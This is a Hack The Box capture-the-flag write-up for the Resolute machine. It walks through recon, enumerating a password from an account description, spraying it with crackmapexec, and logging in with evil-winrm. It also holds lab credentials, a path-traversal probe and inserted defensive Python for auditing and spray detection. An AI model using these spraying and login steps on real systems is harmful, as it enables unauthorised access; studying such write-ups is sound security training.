title: Hack The Box - Resolute (password spraying and a SYSTEM shell via remote DLL injection into the DNS service) author: World'sEnd layout: true categories: Internal network security tags:
• Target-practice diary
Don't let your future self hate your present self.
Hack The Box - Resolute
# Nmap 7.92 scan initiated Sat Apr 23 17:10:45 2022 as: nmap -sC -sV -T4 -Pn -p- -oA nmap.txt 10.10.10.169
Nmap scan report for 10.10.10.169
Host is up (0.48s latency).
Not shown: 65512 closed tcp ports (reset)
PORT STATE SERVICE VERSION
88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2022-04-23 09:32:06Z)
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: megabank.local, Site: Default-First-Site-Name)
445/tcp open microsoft-ds Windows Server 2016 Standard 14393 microsoft-ds (workgroup: MEGABANK)
464/tcp open kpasswd5?
593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
636/tcp open tcpwrapped
3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: megabank.local, Site: Default-First-Site-Name)
3269/tcp open tcpwrapped
5985/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
9389/tcp open mc-nmf .NET Message Framing
47001/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
49664/tcp open msrpc Microsoft Windows RPC
49665/tcp open msrpc Microsoft Windows RPC
49666/tcp open msrpc Microsoft Windows RPC
49667/tcp open msrpc Microsoft Windows RPC
49671/tcp open msrpc Microsoft Windows RPC
49674/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
49675/tcp open msrpc Microsoft Windows RPC
49680/tcp open msrpc Microsoft Windows RPC
49712/tcp open msrpc Microsoft Windows RPC
50105/tcp open tcpwrapped
Service Info: Host: RESOLUTE; OS: Windows; CPE: cpe:/o:microsoft:windows
Host script results:
|_clock-skew: mean: 2h26m59s, deviation: 4h02m30s, median: 6m59s
| smb2-time:
| date: 2022-04-23T09:33:06
|_ start_date: 2022-04-23T09:16:10
| smb2-security-mode:
| 3.1.1:
|_ Message signing enabled and required
| smb-os-discovery:
| OS: Windows Server 2016 Standard 14393 (Windows Server 2016 Standard 6.3)
| Computer name: Resolute
| NetBIOS computer name: RESOLUTE\x00
| Domain name: megabank.local
| Forest name: megabank.local
| FQDN: Resolute.megabank.local
|_ System time: 2022-04-23T02:33:02-07:00
| smb-security-mode:
| account_used:
| authentication_level: user
| challenge_response: supported
|_ message_signing: required
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Sat Apr 23 17:26:25 2022 -- 1 IP address (1 host up) scanned in 940.01 seconds
DNS protocol:
Nmap enumerated megabank.local for me, but by convention the target should also have resolute.local, so I can try it:
$ dig @10.10.10.169 megabank.local
; <<>> DiG 9.18.0-2-Debian <<>> @10.10.10.169 megabank.local
; (1 server found)
;; global options: +cmd
;; Got answer:
;; WARNING: .local is reserved for Multicast DNS
;; You are currently testing what happens when an mDNS query is leaked to DNS
;; ->>HEADER<<- opcode: QUERY, status: NOERROR, id: 20763
;; flags: qr aa rd ra; QUERY: 1, ANSWER: 1, AUTHORITY: 0, ADDITIONAL: 1
;; OPT PSEUDOSECTION:
; EDNS: version: 0, flags:; udp: 4000
;; QUESTION SECTION:
;megabank.local. IN A
;; ANSWER SECTION:
megabank.local. 600 IN A 10.10.10.169
;; Query time: 187 msec
;; SERVER: 10.10.10.169#53(10.10.10.169) (UDP)
;; WHEN: Sat Apr 23 17:31:30 CST 2022
;; MSG SIZE rcvd: 59
But I was wrong:
$ dig @10.10.10.169 resolute.local
; <<>> DiG 9.18.0-2-Debian <<>> @10.10.10.169 resolute.local
; (1 server found)
;; global options: +cmd
;; connection timed out; no servers could be reached
It does not have that domain, so this box may be a little unusual. I will still try a zone transfer, even though it has never succeeded for me:
$ dig axfr @10.10.10.169 megabank.local
; <<>> DiG 9.18.0-2-Debian <<>> axfr @10.10.10.169 megabank.local
; (1 server found)
;; global options: +cmd
; Transfer failed.
RPC port:
Even now the RPC port still feels mysterious to me: I know some of the things it can be used for, but I cannot estimate exactly what, or how much, it can do. I can try an anonymous connection:
$ rpcclient -U "" -N 10.10.10.169
rpcclient $>
It looks like anonymous access is allowed, so I can try to enumerate some information about the target:
rpcclient $> enumdomusers
user:[Administrator] rid:[0x1f4]
user:[Guest] rid:[0x1f5]
user:[krbtgt] rid:[0x1f6]
user:[DefaultAccount] rid:[0x1f7]
user:[ryan] rid:[0x451]
user:[marko] rid:[0x457]
user:[sunita] rid:[0x19c9]
user:[abigail] rid:[0x19ca]
user:[marcus] rid:[0x19cb]
user:[sally] rid:[0x19cc]
user:[fred] rid:[0x19cd]
user:[angela] rid:[0x19ce]
user:[felicia] rid:[0x19cf]
user:[gustavo] rid:[0x19d0]
user:[ulf] rid:[0x19d1]
user:[stevie] rid:[0x19d2]
user:[claire] rid:[0x19d3]
user:[paulo] rid:[0x19d4]
user:[steve] rid:[0x19d5]
user:[annette] rid:[0x19d6]
user:[annika] rid:[0x19d7]
user:[per] rid:[0x19d8]
user:[claude] rid:[0x19d9]
user:[melanie] rid:[0x2775]
user:[zach] rid:[0x2776]
user:[simon] rid:[0x2777]
user:[naoki] rid:[0x2778]
With that I have a set of usernames that could be used for Kerberos username enumeration, but if I want more information about the users:
rpcclient $> querydispinfo
index: 0x10b0 RID: 0x19ca acb: 0x00000010 Account: abigail Name: (null) Desc: (null)
index: 0xfbc RID: 0x1f4 acb: 0x00000210 Account: Administrator Name: (null) Desc: Built-in account for administering the computer/domain
index: 0x10b4 RID: 0x19ce acb: 0x00000010 Account: angela Name: (null) Desc: (null)
index: 0x10bc RID: 0x19d6 acb: 0x00000010 Account: annette Name: (null) Desc: (null)
index: 0x10bd RID: 0x19d7 acb: 0x00000010 Account: annika Name: (null) Desc: (null)
index: 0x10b9 RID: 0x19d3 acb: 0x00000010 Account: claire Name: (null) Desc: (null)
index: 0x10bf RID: 0x19d9 acb: 0x00000010 Account: claude Name: (null) Desc: (null)
index: 0xfbe RID: 0x1f7 acb: 0x00000215 Account: DefaultAccount Name: (null) Desc: A user account managed by the system.
index: 0x10b5 RID: 0x19cf acb: 0x00000010 Account: felicia Name: (null) Desc: (null)
index: 0x10b3 RID: 0x19cd acb: 0x00000010 Account: fred Name: (null) Desc: (null)
index: 0xfbd RID: 0x1f5 acb: 0x00000215 Account: Guest Name: (null) Desc: Built-in account for guest access to the computer/domain
index: 0x10b6 RID: 0x19d0 acb: 0x00000010 Account: gustavo Name: (null) Desc: (null)
index: 0xff4 RID: 0x1f6 acb: 0x00000011 Account: krbtgt Name: (null) Desc: Key Distribution Center Service Account
index: 0x10b1 RID: 0x19cb acb: 0x00000010 Account: marcus Name: (null) Desc: (null)
index: 0x10a9 RID: 0x457 acb: 0x00000210 Account: marko Name: Marko Novak Desc: Account created. Password set to Welcome123!
index: 0x10c0 RID: 0x2775 acb: 0x00000010 Account: melanie Name: (null) Desc: (null)
index: 0x10c3 RID: 0x2778 acb: 0x00000010 Account: naoki Name: (null) Desc: (null)
index: 0x10ba RID: 0x19d4 acb: 0x00000010 Account: paulo Name: (null) Desc: (null)
index: 0x10be RID: 0x19d8 acb: 0x00000010 Account: per Name: (null) Desc: (null)
index: 0x10a3 RID: 0x451 acb: 0x00000210 Account: ryan Name: Ryan Bertrand Desc: (null)
index: 0x10b2 RID: 0x19cc acb: 0x00000010 Account: sally Name: (null) Desc: (null)
index: 0x10c2 RID: 0x2777 acb: 0x00000010 Account: simon Name: (null) Desc: (null)
index: 0x10bb RID: 0x19d5 acb: 0x00000010 Account: steve Name: (null) Desc: (null)
index: 0x10b8 RID: 0x19d2 acb: 0x00000010 Account: stevie Name: (null) Desc: (null)
index: 0x10af RID: 0x19c9 acb: 0x00000010 Account: sunita Name: (null) Desc: (null)
index: 0x10b7 RID: 0x19d1 acb: 0x00000010 Account: ulf Name: (null) Desc: (null)
index: 0x10c1 RID: 0x2776 acb: 0x00000010 Account: zach Name: (null) Desc: (null)
rpcclient $>
For readability, I cut out the important line:
index: 0x10a9 RID: 0x457 acb: 0x00000210 Account: marko Name: Marko Novak Desc: Account created. Password set to Welcome123!
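As an added example (not part of the original post), here is a small Python parser for rpcclient's `querydispinfo` output: it decodes the `acb` account-control bits (the ACB_* names from MS-SAMR) and flags any description field that contains credential-like text, which is exactly the audit a defender should run over their own domain before an attacker does. The sample lines are a subset of the output above; the `SECRET_RE` word list is my own choice.

```python
import re
from dataclasses import dataclass

# ACB_* account-control bits (MS-SAMR 2.2.1.12) as shown in rpcclient's "acb:" column.
ACB_FLAGS = {
    0x0001: "DISABLED",
    0x0002: "HOMDIRREQ",
    0x0004: "PWNOTREQ",
    0x0008: "TEMPDUP",
    0x0010: "NORMAL",
    0x0020: "MNS",
    0x0040: "DOMTRUST",
    0x0080: "WSTRUST",
    0x0100: "SVRTRUST",
    0x0200: "PWNOEXP",
    0x0400: "AUTOLOCK",
}

LINE_RE = re.compile(
    r"index:\s*(?P<index>0x[0-9a-f]+)\s+RID:\s*(?P<rid>0x[0-9a-f]+)\s+"
    r"acb:\s*(?P<acb>0x[0-9a-f]+)\s+Account:\s*(?P<account>\S+)\s+"
    r"Name:\s*(?P<name>.*?)\s+Desc:\s*(?P<desc>.*)$",
    re.IGNORECASE,
)

# Words that, in a description field, usually mean someone wrote a credential down.
SECRET_RE = re.compile(r"\b(password|passwd|pwd|pass)\b", re.IGNORECASE)


@dataclass
class DisplayEntry:
    rid: int
    acb: int
    account: str
    name: str
    desc: str

    @property
    def flags(self):
        return [name for bit, name in ACB_FLAGS.items() if self.acb & bit]

    @property
    def enabled(self):
        return not (self.acb & 0x0001)

    @property
    def leaks_secret(self):
        return self.desc != "(null)" and SECRET_RE.search(self.desc) is not None


def parse_querydispinfo(text):
    """Parse rpcclient 'querydispinfo' output into DisplayEntry objects; non-matching lines are skipped."""
    entries = []
    for line in text.splitlines():
        m = LINE_RE.search(line)
        if m:
            entries.append(DisplayEntry(
                rid=int(m["rid"], 16),
                acb=int(m["acb"], 16),
                account=m["account"],
                name=m["name"],
                desc=m["desc"].strip(),
            ))
    return entries


def audit(text):
    """Return (account, reason) pairs for the things a defender should clean up."""
    findings = []
    for e in parse_querydispinfo(text):
        if e.leaks_secret:
            findings.append((e.account, "credential-like text in description"))
        if e.enabled and e.acb & 0x0004:
            findings.append((e.account, "password not required"))
        if e.enabled and e.acb & 0x0200:
            findings.append((e.account, "password never expires"))
    return findings


# Sample input: a subset of the querydispinfo lines shown above.
SAMPLE = """\
index: 0x10b0 RID: 0x19ca acb: 0x00000010 Account: abigail Name: (null) Desc: (null)
index: 0xfbc RID: 0x1f4 acb: 0x00000210 Account: Administrator Name: (null) Desc: Built-in account for administering the computer/domain
index: 0xfbe RID: 0x1f7 acb: 0x00000215 Account: DefaultAccount Name: (null) Desc: A user account managed by the system.
index: 0xfbd RID: 0x1f5 acb: 0x00000215 Account: Guest Name: (null) Desc: Built-in account for guest access to the computer/domain
index: 0xff4 RID: 0x1f6 acb: 0x00000011 Account: krbtgt Name: (null) Desc: Key Distribution Center Service Account
index: 0x10a9 RID: 0x457 acb: 0x00000210 Account: marko Name: Marko Novak Desc: Account created. Password set to Welcome123!
index: 0x10a3 RID: 0x451 acb: 0x00000210 Account: ryan Name: Ryan Bertrand Desc: (null)
"""

if __name__ == "__main__":
    for e in parse_querydispinfo(SAMPLE):
        print(f"{e.account:15} rid={e.rid:<6} {'|'.join(e.flags):20} {e.desc}")
    for account, reason in audit(SAMPLE):
        print(f"[!] {account}: {reason}")
```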
I tried logging in to the target, without success:
$ evil-winrm -i 10.10.10.169 -u marco -p 'Welcome123!'
Evil-WinRM shell v3.3
Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine
Data: For more information, check Evil-WinRM Github: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
Info: Establishing connection to remote endpoint
Error: An error of type WinRM::WinRMAuthorizationError happened, message is WinRM::WinRMAuthorizationError
Error: Exiting with code 1
LDAP port:
I still do not know how to use ldapsearch, but I found a substitute: Nmap ships some default LDAP scripts. LDAP queries return a lot of junk, so I only include the parts relevant to the target, enough to satisfy my curiosity about LDAP:
$ sudo nmap -sT -Pn -n --open 10.10.10.169 -p389 --script ldap-rootdse
Starting Nmap 7.92 ( https://nmap.org ) at 2022-04-23 17:56 CST
Nmap scan report for 10.10.10.169
Host is up (0.17s latency).
PORT STATE SERVICE
389/tcp open ldap
| ldap-rootdse:
| LDAP Results
| <ROOT>
| currentTime: 20220423100354.0Z
| subschemaSubentry: CN=Aggregate,CN=Schema,CN=Configuration,DC=megabank,DC=local
| dsServiceName: CN=NTDS Settings,CN=RESOLUTE,CN=Servers,CN=Default-First-Site-Name,CN=Sites,CN=Configuration,DC=megabank,DC=local
| namingContexts: DC=megabank,DC=local
| namingContexts: CN=Configuration,DC=megabank,DC=local
| namingContexts: CN=Schema,CN=Configuration,DC=megabank,DC=local
| namingContexts: DC=DomainDnsZones,DC=megabank,DC=local
| namingContexts: DC=ForestDnsZones,DC=megabank,DC=local
| defaultNamingContext: DC=megabank,DC=local
| schemaNamingContext: CN=Schema,CN=Configuration,DC=megabank,DC=local
| configurationNamingContext: CN=Configuration,DC=megabank,DC=local
| rootDomainNamingContext: DC=megabank,DC=local
......
| supportedLDAPVersion: 3
| supportedLDAPVersion: 2
| supportedLDAPPolicies: MaxPoolThreads
| supportedLDAPPolicies: MaxPercentDirSyncRequests
| supportedLDAPPolicies: MaxDatagramRecv
| supportedLDAPPolicies: MaxReceiveBuffer
| supportedLDAPPolicies: InitRecvTimeout
| supportedLDAPPolicies: MaxConnections
| supportedLDAPPolicies: MaxConnIdleTime
| supportedLDAPPolicies: MaxPageSize
| supportedLDAPPolicies: MaxBatchReturnMessages
| supportedLDAPPolicies: MaxQueryDuration
| supportedLDAPPolicies: MaxDirSyncDuration
| supportedLDAPPolicies: MaxTempTableSize
| supportedLDAPPolicies: MaxResultSetSize
| supportedLDAPPolicies: MinResultSets
| supportedLDAPPolicies: MaxResultSetsPerConn
| supportedLDAPPolicies: MaxNotificationPerConn
| supportedLDAPPolicies: MaxValRange
| supportedLDAPPolicies: MaxValRangeTransitive
| supportedLDAPPolicies: ThreadMemoryLimit
| supportedLDAPPolicies: SystemMemoryLimitPercent
| highestCommittedUSN: 151908
| supportedSASLMechanisms: GSSAPI
| supportedSASLMechanisms: GSS-SPNEGO
| supportedSASLMechanisms: EXTERNAL
| supportedSASLMechanisms: DIGEST-MD5
| dnsHostName: Resolute.megabank.local
| ldapServiceName: megabank.local:resolute$@MEGABANK.LOCAL
| serverName: CN=RESOLUTE,CN=Servers,CN=Default-First-Site-Name,CN=Sites,CN=Configuration,DC=megabank,DC=local
......
| isSynchronized: TRUE
| isGlobalCatalogReady: TRUE
| domainFunctionality: 7
| forestFunctionality: 7
|_ domainControllerFunctionality: 7
Service Info: Host: RESOLUTE; OS: Windows
Nmap done: 1 IP address (1 host up) scanned in 2.12 seconds
It seems to have a subdomain:
resolute$@MEGABANK.LOCAL
SMB port:
Unfortunately, the target does not allow anonymous access to its shares:
$ smbclient -N -L \\10.10.10.169
Anonymous login successful
Sharename Type Comment
--------- ---- -------
Reconnecting with SMB1 for workgroup listing.
do_connect: Connection to 10.10.10.169 failed (Error NT_STATUS_RESOURCE_NAME_NOT_FOUND)
Unable to connect with SMB1 -- no workgroup available
Perhaps I can try the password obtained via RPC:
$ crackmapexec smb 10.10.10.169 -u marco -p 'Welcome123!' --continue-on-success
SMB 10.10.10.169 445 RESOLUTE [*] Windows Server 2016 Standard 14393 x64 (name:RESOLUTE) (domain:megabank.local) (signing:True) (SMBv1:True)
SMB 10.10.10.169 445 RESOLUTE [-] megabank.local\marco:Welcome123! STATUS_LOGON_FAILURE
That does not work either. I do not think the other ports are worth writing up, since there is nothing on them, especially the two HTTP service ports, which both return Not Found. Even brute-forcing them turns up nothing:
$ dirsearch -u http://10.10.10.169:5985/
_|. _ _ _ _ _ _|_ v0.4.2
(_||| _) (/_(_|| (_| )
Extensions: php, aspx, jsp, html, js | HTTP method: GET | Threads: 30 | Wordlist size: 10927
Output File: /home/worldisend/.dirsearch/reports/10.10.10.169-5985/-_22-04-23_17-51-44.txt
Error Log: /home/worldisend/.dirsearch/logs/errors-22-04-23_17-51-44.log
Target: http://10.10.10.169:5985/
[17:51:45] Starting:
[17:51:51] 403 - 312B - /%2e%2e//google.com
[17:52:25] 403 - 312B - /\..\..\..\..\..\..\..\..\..\etc\passwd
[17:54:23] 405 - 0B - /wsman
Task Completed
Kerberos port:
I can extract the usernames enumerated over RPC into a wordlist. There is no need to enumerate usernames here, because RPC queried these users from the target machine itself, so they definitely exist.
Administrator
Guest
krbtgt
DefaultAccount
ryan
marko
sunita
abigail
marcus
sally
fred
angela
felicia
gustavo
ulf
stevie
claire
paulo
steve
annette
annika
per
claude
melanie
zach
simon
naoki
I tried to enumerate users on the target that would hand out AS-REP hashes:
$ ../toolbox/impacket-0.9.24/examples/GetNPUsers.py 'MEGABANK.LOCAL/' -usersfile ./users.txt -format hashcat -outputfile hashes.txt -dc-ip 10.10.10.169
Impacket v0.9.24 - Copyright 2021 SecureAuth Corporation
[-] User Administrator doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] Kerberos SessionError: KDC_ERR_CLIENT_REVOKED(Clients credentials have been revoked)
[-] Kerberos SessionError: KDC_ERR_CLIENT_REVOKED(Clients credentials have been revoked)
[-] Kerberos SessionError: KDC_ERR_CLIENT_REVOKED(Clients credentials have been revoked)
[-] User ryan doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User marko doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User sunita doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User abigail doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User marcus doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User sally doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User fred doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User angela doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User felicia doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User gustavo doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User ulf doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User stevie doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User claire doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User paulo doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User steve doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User annette doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User annika doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User per doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User claude doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User melanie doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User zach doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User simon doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User naoki doesn't have UF_DONT_REQUIRE_PREAUTH set
But I failed: not a single hash. I did not expect to hit a dead end so quickly this time, because all I have right now is a pile of usernames and one password.
Password spraying:
I was still thinking too narrowly. The target machine carries the tag "Password Spraying". It is similar to brute forcing, except that with password spraying you already hold a password and test it against many different usernames in order to obtain a complete, valid set of account credentials. I can use the SMB share to confirm this indirectly. There is a lot of output, so I will cut out the key part, because it is really obvious:
$ crackmapexec smb 10.10.10.169 -u ./users.txt -p 'Welcome123!' --continue-on-success
SMB 10.10.10.169 445 RESOLUTE [*] Windows Server 2016 Standard 14393 x64 (name:RESOLUTE) (domain:megabank.local) (signing:True) (SMBv1:True)
SMB 10.10.10.169 445 RESOLUTE [-] megabank.local\Administrator:Welcome123! STATUS_LOGON_FAILURE
SMB 10.10.10.169 445 RESOLUTE [-] megabank.local\Guest:Welcome123! STATUS_LOGON_FAILURE
SMB 10.10.10.169 445 RESOLUTE [+] megabank.local\melanie:Welcome123!
SMB 10.10.10.169 445 RESOLUTE [-] megabank.local\zach:Welcome123! STATUS_LOGON_FAILURE
SMB 10.10.10.169 445 RESOLUTE [-] megabank.local\simon:Welcome123! STATUS_LOGON_FAILURE
SMB 10.10.10.169 445 RESOLUTE [-] megabank.local\naoki:Welcome123! STATUS_LOGON_FAILURE
Fourth line from the bottom: it looks like the password I obtained matches melanie.
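The spray above is also what the defender sees in the domain controller's Security log: a single source failing against many different accounts in a short window, then a successful logon. As an added example (not part of the original post), here is a sliding-window detector in Python over constructed 4625/4624-style records; the field names and the sample events are my own reduced representation, not real event log output.

```python
from collections import defaultdict, deque
from datetime import datetime


def ev(time, event_id, user, source_ip):
    """One Security-log logon event reduced to the fields the detector needs."""
    return {"time": time, "event_id": event_id, "user": user, "source_ip": source_ip}


# Constructed sample, not real telemetry: one source fails once against each of
# eight accounts (the spray), then logs on successfully as melanie; a second
# source is a single user mistyping their own password three times.
SPRAYED = ["Administrator", "Guest", "krbtgt", "DefaultAccount", "ryan", "marko", "sunita", "abigail"]
SAMPLE_EVENTS = (
    [ev(f"2022-04-23T10:20:{i:02d}", 4625, u, "10.10.16.7") for i, u in enumerate(SPRAYED, start=1)]
    + [ev("2022-04-23T10:20:09", 4624, "melanie", "10.10.16.7")]
    + [ev(f"2022-04-23T10:25:{i:02d}", 4625, "ryan", "10.10.10.50") for i in range(3)]
)


def detect_spray(events, window_s=60, min_users=5):
    """Sliding-window detector: alert on a source that fails against at least
    min_users distinct accounts within window_s seconds. A plain brute force
    (many failures, one account) does not trip it. Successful logons (4624)
    from an alerted source are recorded as likely compromised accounts."""
    events = sorted(events, key=lambda e: e["time"])
    recent = defaultdict(deque)  # source_ip -> deque of (timestamp, user) for 4625s
    alerts = {}
    for e in events:
        ts, src = datetime.fromisoformat(e["time"]), e["source_ip"]
        if e["event_id"] == 4625:
            q = recent[src]
            q.append((ts, e["user"]))
            while (ts - q[0][0]).total_seconds() > window_s:
                q.popleft()
            distinct = {u for _, u in q}
            if src in alerts:
                alerts[src]["distinct_users"] = max(alerts[src]["distinct_users"], len(distinct))
            elif len(distinct) >= min_users:
                alerts[src] = {
                    "source_ip": src,
                    "distinct_users": len(distinct),
                    "first_failure": q[0][0].isoformat(),
                    "compromised": [],
                }
        elif e["event_id"] == 4624 and src in alerts:
            alerts[src]["compromised"].append(e["user"])
    return list(alerts.values())


if __name__ == "__main__":
    for a in detect_spray(SAMPLE_EVENTS):
        print(f"spray from {a['source_ip']}: {a['distinct_users']} accounts since {a['first_failure']}, "
              f"successful logons afterwards: {a['compromised'] or 'none'}")
```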
Logging in as melanie and getting user.txt:
I can try logging in to the target:
$ evil-winrm -i 10.10.10.169 -u melanie -p 'Welcome123!'
Evil-WinRM shell v3.3
Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine
Data: For more information, check Evil-WinRM Github: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\melanie\Documents>
It worked, and I got user.txt:
*Evil-WinRM* PS C:\Users\melanie\Documents> cd ../desktop
*Evil-WinRM* PS C:\Users\melanie\desktop> ls
Directory: C:\Users\melanie\desktop
Mode LastWriteTime Length Name
---- ------------- ------ ----
-ar--- 4/23/2022 2:16 AM 34 user.txt
*Evil-WinRM* PS C:\Users\melanie\desktop> type user.txt
Domain reconnaissance:
The current user does not have many privileges:
*Evil-WinRM* PS C:\Users\melanie\desktop> whoami /priv
PRIVILEGES INFORMATION
----------------------
Privilege Name Description State
============================= ============================== =======
SeMachineAccountPrivilege Add workstations to domain Enabled
SeChangeNotifyPrivilege Bypass traverse checking Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set Enabled
*Evil-WinRM* PS C:\Users\melanie\desktop>
I can take a look at the account details:
*Evil-WinRM* PS C:\Users\melanie> net user melanie
User name melanie
Full Name
Comment
User's comment
Country/region code 000 (System Default)
Account active Yes
Account expires Never
Password last set 4/23/2022 4:53:03 AM
Password expires Never
Password changeable 4/24/2022 4:53:03 AM
Password required Yes
User may change password Yes
Workstations allowed All
Logon script
User profile
Home directory
Last logon Never
Logon hours allowed All
Local Group Memberships *Remote Management Use
Global Group memberships *Domain Users
The command completed successfully.
*Evil-WinRM* PS C:\Users\melanie>
Nothing much there. I can look at its group information:
*Evil-WinRM* PS C:\Users\melanie> whoami /groups
GROUP INFORMATION
-----------------
Group Name Type SID Attributes
========================================== ================ ============ ==================================================
Everyone Well-known group S-1-1-0 Mandatory group, Enabled by default, Enabled group
BUILTIN\Remote Management Users Alias S-1-5-32-580 Mandatory group, Enabled by default, Enabled group
BUILTIN\Users Alias S-1-5-32-545 Mandatory group, Enabled by default, Enabled group
BUILTIN\Pre-Windows 2000 Compatible Access Alias S-1-5-32-554 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\NETWORK Well-known group S-1-5-2 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\Authenticated Users Well-known group S-1-5-11 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\This Organization Well-known group S-1-5-15 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\NTLM Authentication Well-known group S-1-5-64-10 Mandatory group, Enabled by default, Enabled group
Mandatory Label\Medium Mandatory Level Label S-1-16-8192
*Evil-WinRM* PS C:\Users\melanie>
Nothing useful, and the user's home directory holds nothing useful either. In the Users directory there is a ryan directory; I think this user deserves attention, since, at the very least, compared with the other users this one has actually logged in to the target machine:
*Evil-WinRM* PS C:\Users> ls
Directory: C:\Users
Mode LastWriteTime Length Name
---- ------------- ------ ----
d----- 9/25/2019 10:43 AM Administrator
d----- 12/4/2019 2:46 AM melanie
d-r--- 11/20/2016 6:39 PM Public
d----- 9/27/2019 7:05 AM ryan
*Evil-WinRM* PS C:\Users>
In the root of the drive I found some hidden directories:
*Evil-WinRM* PS C:\> ls
Directory: C:\
Mode LastWriteTime Length Name
---- ------------- ------ ----
d----- 9/25/2019 6:19 AM PerfLogs
d-r--- 9/25/2019 12:39 PM Program Files
d----- 11/20/2016 6:36 PM Program Files (x86)
d-r--- 12/4/2019 2:46 AM Users
d----- 12/4/2019 5:15 AM Windows
*Evil-WinRM* PS C:\> ls -force
Directory: C:\
Mode LastWriteTime Length Name
---- ------------- ------ ----
d--hs- 12/3/2019 6:40 AM $RECYCLE.BIN
d--hsl 9/25/2019 10:17 AM Documents and Settings
d----- 9/25/2019 6:19 AM PerfLogs
d-r--- 9/25/2019 12:39 PM Program Files
d----- 11/20/2016 6:36 PM Program Files (x86)
d--h-- 9/25/2019 10:48 AM ProgramData
d--h-- 12/3/2019 6:32 AM PSTranscripts
d--hs- 9/25/2019 10:17 AM Recovery
d--hs- 9/25/2019 6:25 AM System Volume Information
d-r--- 12/4/2019 2:46 AM Users
d----- 12/4/2019 5:15 AM Windows
-arhs- 11/20/2016 5:59 PM 389408 bootmgr
-a-hs- 7/16/2016 6:10 AM 1 BOOTNXT
-a-hs- 4/23/2022 2:15 AM 402653184 pagefile.sys
*Evil-WinRM* PS C:\>
PSTranscripts is not a directory a machine should normally have, and under it there is indeed a hidden directory:
*Evil-WinRM* PS C:\> cd PSTranscripts
*Evil-WinRM* PS C:\PSTranscripts> ls
*Evil-WinRM* PS C:\PSTranscripts> ls -force
Directory: C:\PSTranscripts
Mode LastWriteTime Length Name
---- ------------- ------ ----
d--h-- 12/3/2019 6:45 AM 20191203
*Evil-WinRM* PS C:\PSTranscripts>
Inside the hidden directory there is also a hidden text file:
*Evil-WinRM* PS C:\PSTranscripts> cd 20191203
*Evil-WinRM* PS C:\PSTranscripts\20191203> dir
*Evil-WinRM* PS C:\PSTranscripts\20191203> ls -force
Directory: C:\PSTranscripts\20191203
Mode LastWriteTime Length Name
---- ------------- ------ ----
-arh-- 12/3/2019 6:45 AM 3732 PowerShell_transcript.RESOLUTE.OJuoBGhU.20191203063201.txt
I can take a look at it; I removed some unnecessary parts:
*Evil-WinRM* PS C:\PSTranscripts\20191203> type PowerShell_transcript.RESOLUTE.OJuoBGhU.20191203063201.txt
**********************
Windows PowerShell transcript start
Start time: 20191203063201
Username: MEGABANK\ryan
RunAs User: MEGABANK\ryan
......
Host Application: C:\Windows\system32\wsmprovhost.exe -Embedding
......
**********************
**********************
......
PS>CommandInvocation(Invoke-Expression): "Invoke-Expression"
>> ParameterBinding(Invoke-Expression): name="Command"; value="cmd /c net use X: \\fs01\backups ryan Serv3r4Admin4cc123!
......
+ cmd /c net use X: \\fs01\backups ryan Serv3r4Admin4cc123!
+ ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+ CategoryInfo : NotSpecified: (The syntax of this command is::String) [], RemoteException
+ FullyQualifiedErrorId : NativeCommandError
cmd : The syntax of this command is:
At line:1 char:1
+ cmd /c net use X: \\fs01\backups ryan Serv3r4Admin4cc123!
+ ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+ CategoryInfo : NotSpecified: (The syntax of this command is::String) [], RemoteException
+ FullyQualifiedErrorId : NativeCommandError
......
*Evil-WinRM* PS C:\PSTranscripts\20191203>
The transcript mentions several times a string that looks like a password, "Serv3r4Admin4cc123!", together with the user "ryan".
Logging in as ryan:
I can try logging in as ryan:
$ evil-winrm -i 10.10.10.169 -u ryan -p Serv3r4Admin4cc123!
Evil-WinRM shell v3.3
Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine
